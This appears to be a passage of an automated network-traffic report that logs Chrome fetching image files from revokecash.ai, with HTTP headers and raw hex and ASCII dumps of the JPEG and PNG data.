                                                                          2023-12-10 16:44:31 UTC1369INData Raw: 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 d3 f1 b7 38 00 00 00 00 00 02 b4 ab 28 10 01 7d 99 31 b4 09 b2 63 ca e7 10 54 c9 8f 23 56 db 75 a0 09 c8 8f 26 35 48 4d 24 47 91 51 1c 4d a9 5a 32 54 69 31 9c 02 b9 31 65 45 73 51 34 91 1e 45 44 71 36 0c cd 87 36 17 21 35 7d 2a 73 60 54 be cb da b0 26 01 5a 56 8d 02 60 00 00 00 00 00 00 00 00 c5 d6 dc 2b 40 c0 32 63 c9 8c 40 9b 2e 3c 95 38 82 a6 5c 59 45 65 b7 d8 00 39 31 a5 45 70 0a d2 63 49 71 18 2b 52 eb 42 5c 59 71 1c 02 b9 51 25 c4 73 50 a9 26 34 97 11 82 b0 0c f8 24 47 72 0a af 04 d8 0a 64 c7 90 58 c0 c1 17 5b 75 ad 02 60 00 00 00 00 00 00 00 0a d0 ca df 8e f1 52 b6 02 fa e3 04 8c 75 c4 d6 56 22 79 b2 c4 cd 52 ae 04 bc f9 61 e6 6b 25 b8 ac 09 15 8c 1f 23 1e b1 5c 49 46 2b 95 23 8d 94 e0 8a 55 2a
                                                                          Data Ascii: 8(}1cT#Vu&5HM$GQMZ2Ti11eEsQ4EDq66!5}*s`T&ZV`+@2c@.<8\YEe91EpcIq+RB\YqQ%sP&4$GrdX[u`RuV"yRak%#\IF+#U*
                                                                          2023-12-10 16:44:31 UTC1369INData Raw: fc 80 e4 63 4e c5 f9 9f 8a c3 71 ec 53 c9 8c 11 7d a9 d1 d2 23 d4 65 d9 5d 6a 95 51 eb e6 83 74 57 19 1b 45 cf 82 46 98 c7 13 40 19 71 65 c4 d0 26 ba db 9a b4 26 00 00 00 01 55 0c bb 26 1b c5 d9 3d 8d ad ae df 23 60 f1 74 0c fd f8 fb 66 3f 4f 55 57 70 70 3d 7a cf 69 f8 11 f8 bd 89 15 8c 55 26 4f 1b 26 a2 b5 88 9b 97 9f 8d ce e6 4d 91 b1 84 da c1 27 cd c3 40 bc a7 a0 23 4e 42 77 03 c8 de 47 1c 9d 79 1a 71 f4 17 d1 71 f7 f1 77 9f 22 e3 91 af 3f c7 df c6 56 5c 82 02 35 9f 33 84 9f 79 d2 90 91 ac da 43 07 2d 11 12 a2 5d 22 a7 49 f6 c7 a5 46 54 64 dc 8c f0 25 39 b2 98 4a b3 30 82 56 26 21 64 a5 85 57 dd 8a f6 a9 4a 15 02 00 00 00 00 17 d9 7b 56 04 d3 21 c9 a9 8b 5a 56 68 02 44 79 11 ea 42 69 26 34 9b 88 c2 2d 22 3c 8a 9c 78 f2 63 4c 13 9f 02 7c 0b cc 23 47 23
                                                                          Data Ascii: cNqS}#e]jQtWEF@qe&&U&=#`tf?OUWpp=ziU&O&M'@#NBwGyqqw"?V\53yC-]"IFTd%9J0V&!dWJ{V!ZVhDyBi&4-"<xcL|#G#
                                                                          2023-12-10 16:44:31 UTC1369INData Raw: 96 48 78 65 1c 19 37 06 4d c1 93 70 2e 22 ce 3b 24 32 2e 82 a7 ba 3d b5 d1 66 6c c2 66 3f ba ed b4 b2 ed b2 f2 9d 6c e9 ae 83 a7 ba 32 2e 88 91 1c 4b e9 33 28 6e 60 43 26 e0 c9 b8 32 8e 04 c6 5e 59 64 32 8e 0c a3 83 2a b1 95 58 7a 3a cc 9a 19 65 8c b2 c6 5d 61 b6 16 4b 48 5b 0b df 50 e0 28 70 54 38 2a 08 69 58 2c 70 94 38 4a 1c 33 1c 35 03 41 ee 90 dc 31 ba 63 74 c6 00 cb f5 fc c7 cc 30 cb 8e ba 86 d1 43 a2 b3 4f 8e 48 4a 1a 0d b4 1b 68 36 d0 9b 4a 8d 36 2b 91 df b4 74 37 e9 35 27 63 38 5d 93 f5 bb 9b b9 72 d5 bd 31 09 fb 6c 7c 2f 66 e7 cf 74 2b 66 e9 24 5f a5 62 e1 6d 74 46 d4 b6 25 44 91 19 e5 b4 f3 1d e6 c5 1b 67 f7 aa 34 b8 93 4b ed b1 f1 f6 d9 20 4b d9 c6 a6 96 ff 00 62 d1 dd bd a6 b3 ed 3e b9 66 58 19 91 8b 07 73 8e da 5a 31 ce 4f db 63 e1 5b 38 3e
                                                                          Data Ascii: Hxe7Mp.";$2.=flf?l2.K3(n`C&2^Yd2*Xz:e]aKH[P(pT8*iX,p8J35A1ct0COHJh6J6+t75'c8]r1l|/ft+f$_bmtF%Dg4K Kb>fXsZ1Oc[8>
                                                                          2023-12-10 16:44:31 UTC1369INData Raw: 11 03 67 ee 17 d5 f3 77 46 d0 3b 9f 57 37 bd fb 01 be 0e 0e 0f d9 1f b2 3f 68 7e d0 3e 1e e2 47 ed 8f e8 1f d0 3f a4 2b 0c 47 e8 3f 4f c8 ae 66 08 58 1b 7c c9 21 10 6a 17 83 68 ca 93 46 34 b4 c7 ea e1 02 e4 2e da d0 9e e3 94 e7 2d 55 b3 62 9e da 99 65 d7 56 e3 8a 5a cb b0 af 5d 9b fe 5d 67 d2 db df 4f d3 95 d7 e9 e6 ee d2 6e 9f e8 dd a1 bf 1b 5d 52 69 c6 9a 75 d5 b8 b5 2d 71 fb ed 8b 15 e2 94 51 6b aa 72 29 b6 76 a7 35 8a 1d fe d7 8e ad 19 15 06 d6 95 a5 2a 4d f4 58 f3 aa d0 17 31 85 16 07 87 a5 c1 f8 62 81 8a f1 11 48 58 c4 63 e9 73 9e 75 47 1f c1 0b f8 c3 eb 77 c8 ee fa d0 7b c5 94 a7 4c 55 ad ad 26 91 67 ea 13 d5 71 0a 52 ad c2 0d 5f c0 be 3f 3a ac 0d 9d fc b6 57 a6 d0 5e 4e 43 66 ff 00 f3 f5 0f 4b e5 32 ff 00 c8 15 7c 6e e2 be 75 9b 2b 4d 96 b9 f4 84
                                                                          Data Ascii: gwF;W7?h~>G?+G?OfX|!jhF4.-UbeVZ]]gOn]Riu-qQkr)v5*MX1bHXcsuGw{LU&gqR_?:W^NCfK2|nu+M
                                                                          2023-12-10 16:44:31 UTC1369INData Raw: 29 24 47 89 24 9f 68 cd c8 72 4d c5 e1 92 94 32 32 c6 46 58 8d 0e 51 35 24 8f 21 30 64 26 0f 6f 98 3d be 68 7a 0c b3 89 1c 8b db a6 8f 6e 9c 3d b6 70 3a 6c ec 0c 55 20 4c 5c d7 4d 3e db 38 7b 74 e1 ed d3 45 3a 0c b4 ca 41 a8 a9 d3 70 21 ed f3 07 b7 cc 19 09 81 10 e5 14 27 08 64 65 8c 8c b1 92 94 32 52 84 88 92 0d 2c e1 93 92 32 92 46 52 40 6a 33 e4 ea 0c dc 8b 20 dc 5e 19 29 40 a0 4b 05 4d 9a 66 28 56 29 c7 a1 3c b5 d4 a8 73 23 c8 52 08 e0 4b 2e 67 12 49 03 8e f1 05 34 e7 0d 24 38 6b 1c 35 8d c5 8d c5 05 a4 f1 1b a6 30 3f c8 be a3 f4 c4 c6 26 1a 33 de 18 98 c4 c6 26 37 8c 11 9f 01 43 79 43 13 1b ca 1b ca 0f a9 58 34 37 94 37 94 37 94 23 29 59 86 83 ab 57 11 63 7d 43 7d 43 7d 62 2a d5 c2 94 37 d6 37 d6 37 d6 37 d6 1e 5a f2 51 87 11 63 88 b1 c4 58 37 17 81
                                                                          Data Ascii: )$G$hrM22FXQ5$!0d&o=hzn=p:lU L\M>8{tE:Ap!'de2R,2FR@j3 ^)@KMf(V)<s#RK.gI4$8k50?&3&7CyCX4777#)YWc}C}C}b*7777ZQcX7
                                                                          2023-12-10 16:44:31 UTC1369INData Raw: 76 2f ca 9f 8d 72 ec 7a 1a 07 f4 a7 a3 fb d7 2d 40 ef c6 cc e1 c1 e9 b6 7b 60 1d 10 be 8f a7 fb 5f 4e 2a 27 c7 23 0d 1c c7 b4 b5 cd 38 10 68 41 5b 6d e2 b9 6a 38 c5 a6 06 4c 18 6c c5 c5 be 50 67 52 b9 e2 b4 aa e5 d8 bf 2a 7e 35 cb b1 7e 54 fc 6b 95 6c 8f 76 0e 89 ec 1b f3 9c ac 84 c2 58 00 9e 23 e5 23 ad 41 d2 45 0b 7d 60 04 32 72 a3 2c e0 4c f8 f3 0c 05 e7 cd e9 ae 70 5c bb 17 e5 4f c6 b9 76 3f 34 b8 ff 00 4c 74 e7 7f 7a e5 d8 bf 2a 7e 35 cb b1 7e 54 fc 6a d0 27 31 b5 87 ca 06 66 03 9e 2b aa a7 52 b4 08 1d 68 79 68 90 b7 38 36 8d 2e ad 2a 2b cd 5c bd 18 69 d4 df 93 13 fe 6b 96 e2 7b 9a c2 43 7e 4c 45 48 1a 05 73 f4 55 68 3d 23 03 87 a9 0a 9e 81 89 c3 d6 b9 6a 26 b8 c7 57 33 e4 c4 d0 b9 ba ab 9f d1 55 cb b1 7e 54 fc 6a 71 31 81 e1 be 50 37 30 3a ad 0e d5
                                                                          Data Ascii: v/rz-@{`_N*'#8hA[mj8LlPgR*~5~TklvX##AE}`2r,Lp\Ov?4Ltz*~5~Tj'1f+Rhyh86.*+\ik{C~LEHsUh=#j&W3U~Tjq1P70:


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          70192.168.2.549792172.67.152.1054435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:31 UTC352OUTGET /_img/layer3.jpg HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:31 UTC714INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 33 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 31 38 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 30 3a 30 37 3a 33 35 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 34 61 66 30 2d 31 38 63 35 33 33 32 35 30 30 34 22
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:31 GMTContent-Type: image/jpegContent-Length: 19184Connection: closeX-Powered-By: ExpressCache-Control: public, max-age=14400Last-Modified: Sun, 10 Dec 2023 10:07:35 GMTETag: W/"4af0-18c53325004"
                                                                          2023-12-10 16:44:31 UTC655INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64
                                                                          Data Ascii: JFIFHHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@d
                                                                          2023-12-10 16:44:31 UTC1369INData Raw: 2f 2f 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 65 73 63 00 00 00 00 00 00 00 2e 49 45 43 20 36 31 39 36 36 2d 32 2e 31 20 44 65 66 61 75 6c 74 20 52 47 42 20 63 6f 6c 6f 75 72 20 73 70 61 63 65 20 2d 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 2e 49 45 43 20 36 31 39 36 36 2d 32 2e 31 20 44 65 66 61 75 6c 74 20 52 47 42 20 63 6f 6c 6f 75 72 20 73 70 61 63 65 20 2d 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 65 73 63 00 00 00 00 00 00 00 2c 52 65 66 65 72 65 6e 63 65 20 56 69 65 77 69 6e
                                                                          Data Ascii: //www.iec.chIEC http://www.iec.chdesc.IEC 61966-2.1 Default RGB colour space - sRGB.IEC 61966-2.1 Default RGB colour space - sRGBdesc,Reference Viewin
                                                                          2023-12-10 16:44:31 UTC1369INData Raw: 28 a2 28 d4 29 06 29 38 29 6b 29 9d 29 d0 2a 02 2a 35 2a 68 2a 9b 2a cf 2b 02 2b 36 2b 69 2b 9d 2b d1 2c 05 2c 39 2c 6e 2c a2 2c d7 2d 0c 2d 41 2d 76 2d ab 2d e1 2e 16 2e 4c 2e 82 2e b7 2e ee 2f 24 2f 5a 2f 91 2f c7 2f fe 30 35 30 6c 30 a4 30 db 31 12 31 4a 31 82 31 ba 31 f2 32 2a 32 63 32 9b 32 d4 33 0d 33 46 33 7f 33 b8 33 f1 34 2b 34 65 34 9e 34 d8 35 13 35 4d 35 87 35 c2 35 fd 36 37 36 72 36 ae 36 e9 37 24 37 60 37 9c 37 d7 38 14 38 50 38 8c 38 c8 39 05 39 42 39 7f 39 bc 39 f9 3a 36 3a 74 3a b2 3a ef 3b 2d 3b 6b 3b aa 3b e8 3c 27 3c 65 3c a4 3c e3 3d 22 3d 61 3d a1 3d e0 3e 20 3e 60 3e a0 3e e0 3f 21 3f 61 3f a2 3f e2 40 23 40 64 40 a6 40 e7 41 29 41 6a 41 ac 41 ee 42 30 42 72 42 b5 42 f7 43 3a 43 7d 43 c0 44 03 44 47 44 8a 44 ce 45 12 45 55 45 9a 45
                                                                          Data Ascii: (())8)k))**5*h**++6+i++,,9,n,,--A-v--..L.../$/Z///050l0011J1112*2c2233F3334+4e4455M555676r667$7`7788P8899B999:6:t::;-;k;;<'<e<<="=a==> >`>>?!?a??@#@d@@A)AjAAB0BrBBC:C}CDDGDDEEUEE
                                                                          2023-12-10 16:44:31 UTC1369INData Raw: da 00 0c 03 01 00 02 10 03 10 00 00 00 ed f9 5d 33 2f f9 5f dc e7 b4 9d a6 23 93 e0 1c 67 7a e0 df a7 3c 79 24 f6 33 04 84 62 66 44 b0 e0 20 d0 38 01 ca 09 2c 92 b4 4d b3 00 be 64 93 a2 66 cd 81 38 9d 1c 87 af c3 b8 75 f2 ea b9 1d 8e 9e ce bd 43 d1 e6 cd fd 1a 88 c0 6e bc d3 e6 12 e8 5c e3 b8 f0 ef 1a d6 19 7b 18 15 5d 29 81 13 15 a9 02 24 00 89 00 25 95 c1 9d 6c 8a 97 57 06 75 78 c6 5e 1d 0f 66 43 ea de 6d dc 1b a1 f7 3e 2b cf bf 0f a2 76 ef 47 a1 f0 bf 2a f9 76 dd 55 7a ba 96 e4 25 4c 5a 83 aa 1d 5b ad 6c 86 ea 5b 54 2b 1a 07 f7 07 af 55 dc 7f 34 7d 17 d9 4f cf 5d 07 de f9 be 0f a1 7a fc 9f 55 f3 64 93 b2 92 66 45 13 b0 e1 99 e7 87 81 2c 30 09 0c 39 21 25 93 82 4b ac 24 9b e4 4c 36 8b 6c f7 63 b6 0e 27 53 1b d0 f9 86 e9 ed 34 63 b2 db cf 61 f7 9d 1e 01
                                                                          Data Ascii: ]3/_#gz<y$3bfD 8,Mdf8uCn\{])$%lWux^fCm>+vG*vUz%LZ[l[T+U4}O]zUdfE,09!%K$L6lc'S4ca
                                                                          2023-12-10 16:44:31 UTC1369INData Raw: d3 52 ba 90 80 08 80 20 80 44 80 03 43 22 5a 1c 94 bc 59 06 3c bc 45 7c c7 5d aa 1c 31 bb cd 25 5c 3a 7b ae a5 3b 39 b9 6c 57 7d 43 82 45 b1 1a 88 65 02 20 13 35 62 37 6c 0e 33 6a e3 fa 05 e9 1c 6b c9 cb 97 43 d5 b0 96 5b 0e 8b 95 e5 39 0c eb 4d 65 3d ef 9b 79 50 1c 59 13 4a c8 9a 54 07 14 22 c2 81 31 00 e6 22 07 30 40 c9 59 1c b2 ba b5 ac 8b e3 a0 b5 fd 0b 5d 0f ea ce 97 6b 0b 9e 0a b5 da 73 3e 09 43 1f 4f b7 cf 2c be 6a ee ac a2 b0 14 48 04 00 04 80 12 ea f1 6c eb 62 6d 64 59 09 b7 75 cb 6a 39 1e d9 ce f0 9a c7 66 9d c6 74 e8 da f6 bd d3 43 d7 71 6a ef bc da 7a 05 7c ee 2a bb 96 a3 cd dd 42 5e 8c a6 2c 47 1a c9 56 80 81 35 b4 48 6d 5a fd 39 de 57 77 01 3e ff 00 15 76 b6 4e 3d c6 6d 0c 89 f4 bc 11 94 71 60 02 65 40 79 49 13 88 03 0a 03 44 40 48 a0 e6 20
                                                                          Data Ascii: R DC"ZY<E|]1%\:{;9lW}CEe 5b7l3jkC[9Me=yPYJT"1"0@Y]ks>CO,jHlbmdYuj9ftCqjz|*B^,GV5HmZ9Ww>vN=mq`e@yID@H
                                                                          2023-12-10 16:44:31 UTC1369INData Raw: 59 fa 3b ea 73 d5 15 d8 38 c3 85 ee 78 d8 6d f4 68 52 8d 74 01 ac 55 f2 8b 79 fd 2d a0 f1 d8 0d c1 d8 9f 46 49 a1 07 8c 4c a2 93 0e fd e6 ea 3b a1 bb c5 4d eb 0d d1 69 b0 a9 7b 92 e0 1b a8 db d7 51 cc c3 77 c2 81 4d 41 19 11 0e 89 87 d6 56 b2 54 a3 b4 c4 ac a0 6e f3 ee 0d 46 85 69 bd 5b 13 08 aa 9d 71 f7 31 a1 bc 78 a8 e4 22 55 57 56 a9 95 e3 a3 37 bb 55 b2 2d 46 5b 6e 79 f4 ec 2a bc 3b 15 ad 16 49 ac ec 91 d8 ec 95 c3 da 88 71 17 16 a4 f5 54 47 b0 d3 d1 ec 52 9e 78 fd 73 cc 7b 22 c8 98 a2 8b 44 e0 71 4f 6c 5b 6b d2 4e 32 c7 aa 94 df 57 7e 02 2c e4 a5 2b 0a f1 1b 38 c4 98 9b 6d 05 0e cd 69 52 10 52 84 0a e6 4d 6f 1a ed 8b 36 cf 7d a5 ad 6a 37 6a 4e a7 0e 31 6e b7 a3 9f 61 7d 63 74 f6 18 52 68 48 dc 7c ec a4 e3 73 0d de 4f 78 dd 0c 0c 09 8b 41 8e 51 bf 36
                                                                          Data Ascii: Y;s8xmhRtUy-FIL;Mi{QwMAVTnFi[q1x"UWV7U-F[ny*;IqTGRxs{"DqOl[kN2W~,+8miRRMo6}j7jN1na}ctRhH|sOxAQ6
                                                                          2023-12-10 16:44:31 UTC1369INData Raw: 40 82 90 69 8f 6c 59 0c cc 2d f4 28 64 92 31 a4 4c 3b 76 86 99 15 2a 9c 02 4c 39 69 4c a9 77 8a cd 68 32 55 22 c9 9a 54 c4 b6 be 75 29 3c 62 69 ad 1b 93 43 62 18 74 78 d2 2d 91 76 61 b4 75 59 47 a0 61 f6 7b 32 cf bd f5 6d 2d 7d 83 0f 6e 50 2c 2b 46 95 d1 01 da a1 58 7e 4a 65 9f ac 69 49 1b f6 7b 47 f1 cb 60 d4 ca b7 35 17 05 e4 8c 30 4a 47 84 59 16 0b 08 65 0e 3c 9b ca 22 b7 4e 43 b6 26 ad 16 da c1 28 52 bb 30 11 23 3b a7 0a bd d3 dd b2 ef 0f 8c 2e c8 64 b9 50 ba 0d c5 35 80 f3 12 52 b5 18 01 5a 7d e3 0a ab 88 9b fb c1 91 fd 6b c6 2d ef f6 93 a3 aa 12 9f 0f b7 1a b3 26 97 b0 24 7d e3 02 cc 92 6a 86 62 68 0e 03 0f 7c 22 d3 b0 e5 d4 03 32 a5 d5 ec a8 a9 ff 00 aa 17 68 db af 26 a8 97 44 ba 3a cb c3 df f2 85 3b 30 4e b5 b2 dd ee 18 8f 68 84 da 36 94 b2 6f b8
                                                                          Data Ascii: @ilY-(d1L;v*L9iLwh2U"Tu)<biCbtx-vauYGa{2m-}nP,+FX~JeiI{G`50JGYe<"NC&(R0#;.dP5RZ}k-&$}jbh|"2h&D:;0Nh6o
                                                                          2023-12-10 16:44:31 UTC1369INData Raw: 92 c2 2f a9 33 6e a9 42 a0 50 63 be 24 6c bb 4d 99 b2 50 db 45 f6 6e ab 44 a5 02 48 3b 46 31 6b c8 38 fc dc b8 43 68 44 d3 8c a9 c9 86 c2 f0 0a 1c 77 c5 8c e2 51 25 2a 97 9c 68 3c bb c6 44 a8 56 e0 23 6e e0 4e 51 65 32 99 e6 d5 27 32 ba 39 2b 31 a6 35 35 aa 09 fa 40 7b e2 cb 72 72 7a 6e 6e 71 2e 3b a1 0b ae 89 0b ba 56 40 d5 4e cd 99 c5 ac e4 f2 e7 56 a9 b4 94 ba 40 37 70 c1 3b 00 a6 c8 b1 de 90 65 fd 24 c8 5a ae f4 12 05 45 77 98 b5 1d b2 9c 93 6e 6e 61 9b f5 4f d1 a5 5d 23 5c 69 0b 50 52 89 09 09 a9 e8 8c 87 0f 23 d9 8f 41 93 45 e7 d3 c3 18 5a af 4c cc 39 d4 4d 07 6e 51 2e c2 d6 b4 a5 bc 4f aa 3e 50 b6 16 dd 02 92 52 4e fc 0c 59 9c a0 65 a6 83 45 80 94 a4 61 74 e2 7b 61 a9 84 3a d8 5a 0d 41 8d 54 4c 04 e4 97 72 e0 a1 13 f3 ce 3e f6 0a ad 4e 03 77 08 6e
                                                                          Data Ascii: /3nBPc$lMPEnDH;F1k8ChDwQ%*h<DV#nNQe2'29+155@{rrznnq.;V@NV@7p;e$ZEwnnaO]#\iPR#AEZL9MnQ.O>PRNYeEat{a:ZATLr>Nwn
                                                                          2023-12-10 16:44:31 UTC1369INData Raw: 92 49 50 fe 5a b3 fc a7 6c 29 28 52 2f b7 d1 da 36 88 22 0c 1f 3f c9 8b 35 0f cc 29 f7 7e a9 8c 71 c8 ab 3f 0c e1 f9 b4 5a 33 2e ce 3f 5e 67 2f 82 51 d7 27 24 f6 ab 6c 4d cd 3d 34 fa 9d 70 e2 70 03 62 46 e1 c3 c8 d4 a9 38 ab 01 bb 6c 4e 25 a4 94 a5 09 a5 06 27 b6 18 67 48 af ba 33 31 7b 58 70 87 93 75 d5 8f bc 61 b6 2f 21 4a 27 61 a4 4a a9 33 4c 89 37 4e 23 fd 5d 67 d5 3d 43 c0 c5 9c ff 00 ed 09 27 24 e6 30 79 ac 89 cf 0d bd d9 18 5a 14 95 14 a8 50 83 42 3e c9 10 20 42 dd 2d a0 21 26 8b 58 d6 57 55 30 56 a7 54 94 21 26 e8 e8 a7 e2 78 c7 36 a6 0a 49 10 99 06 d5 0c f2 71 f7 93 56 ca 69 bd 46 90 79 20 f2 5b 2a 54 c2 2a 05 68 12 4e 5c 70 86 26 14 0e 93 68 1f 48 3a c9 df da 22 61 bb aa c3 23 88 ec 83 06 0f 9e b4 d4 a9 2b 15 89 34 7d 63 dd 2a 6d ae 7e d3 84 5a
                                                                          Data Ascii: IPZl)(R/6"?5)~q?Z3.?^g/Q'$lM=4ppbF8lN%'gH31{Xpua/!J'aJ3L7N#]g=C'$0yZPB> B-!&XWU0VT!&x6IqViFy [*T*hN\p&hH:"a#+4}c*m~Z


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          71192.168.2.549796172.67.152.1054435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:31 UTC361OUTGET /_img/boring-security.png HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:32 UTC707INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 33 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 37 39 35 36 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 30 3a 30 37 3a 33 37 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 35 63 61 61 65 2d 31 38 63 35 33 33 32 35 39 61 38
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:32 GMTContent-Type: image/pngContent-Length: 379566Connection: closeX-Powered-By: ExpressCache-Control: public, max-age=14400Last-Modified: Sun, 10 Dec 2023 10:07:37 GMTETag: W/"5caae-18c533259a8
                                                                          2023-12-10 16:44:32 UTC662INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 3c 00 00 01 14 08 02 00 00 00 61 f4 a4 cb 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e 4c bc db 92 23 39 92 25 a8 57 c0 8c f4 88 c8 ac ac aa de ae ea 5e d9 d9 4f 58 99 ff ff 96 bd cc c3 c8 76 77 65 44 b8 93 66 00 f4 32 0f 6a f4 4a 3e 84 30 e8 46 23 0c 80 aa 1e 3d 7a 14 f8 df ff fb ff 05 00 cc 12 00 e9 9e 19 66 46 cc ee 96 91 44 a4 aa da 9b ad 95 99 90 88 88 09 49 4c 10 e8 61 11 be cc 10 60 db ef b6 4c 98 08 71 cc 85 8c cc 1c 09 c2 0c 09 ee c6 c2 11 0e 89 11 19 ee 44 84 88 ac 02 90 00 08 88 19 41 c4 cc 34 e7 50 95 d6 da 5a 8e 88 44 68 66 b6 5c 55 3c 82 89 00 73 2d cf 48 22 64 61 44 cc 8c ba 21 22 66 42 42 86 7b 04 10 33 11 84 3b 00 04 00 13 33 21 22 46 a6 bb 13 d2 eb 8b 84 88
                                                                          Data Ascii: PNGIHDR<asRGB IDATx^L#9%W^OXvweDf2jJ>0F#=zfFDILa`LqDA4PZDhf\U<s-H"daD!"fBB{3;3!"F
                                                                          2023-12-10 16:44:32 UTC1369INData Raw: ba 1b 78 0e b3 d6 34 23 91 90 99 3e 3e 1e fb b6 69 eb 66 eb e3 fd fd cf 7f f9 ab a0 7c 1c ef 6b ae fb 76 3f c7 93 48 fa b6 99 1b 66 90 70 99 89 9b af 35 91 e8 38 0e 11 01 c4 6f 5f be 34 6d 73 9a f9 62 91 cc 84 04 51 b1 65 09 79 9e e7 c7 c7 fb 7d df bf 7d fb f6 e3 e3 fd eb 97 af ee fe 7c 3e 6b df 22 40 df fa 5a e6 ee ad 35 37 8f 8c b5 96 b9 09 0b 11 ed fb be 56 30 13 40 44 44 57 85 84 39 c6 b6 ef bd f5 b1 16 32 32 f0 98 e7 39 c7 d6 b7 65 4b 89 11 e9 79 3e 3d a2 35 15 69 90 88 18 88 44 48 84 18 19 6e 16 ee 01 c0 4c 84 ec 6e 11 e1 90 5d 3a b3 04 e4 b2 91 0e c8 98 e9 08 44 4c 00 60 6e 90 50 2f 77 37 33 44 04 00 44 6c ad 3d 1e 8f de 37 26 1e e3 e8 5b cf 84 f0 24 66 55 45 cc f3 3c dd 7c d9 12 11 66 3e cf b3 0c 10 00 3e 3e 3e f6 7d 8f 88 cc 9c 73 22 e2 b6 ed 11
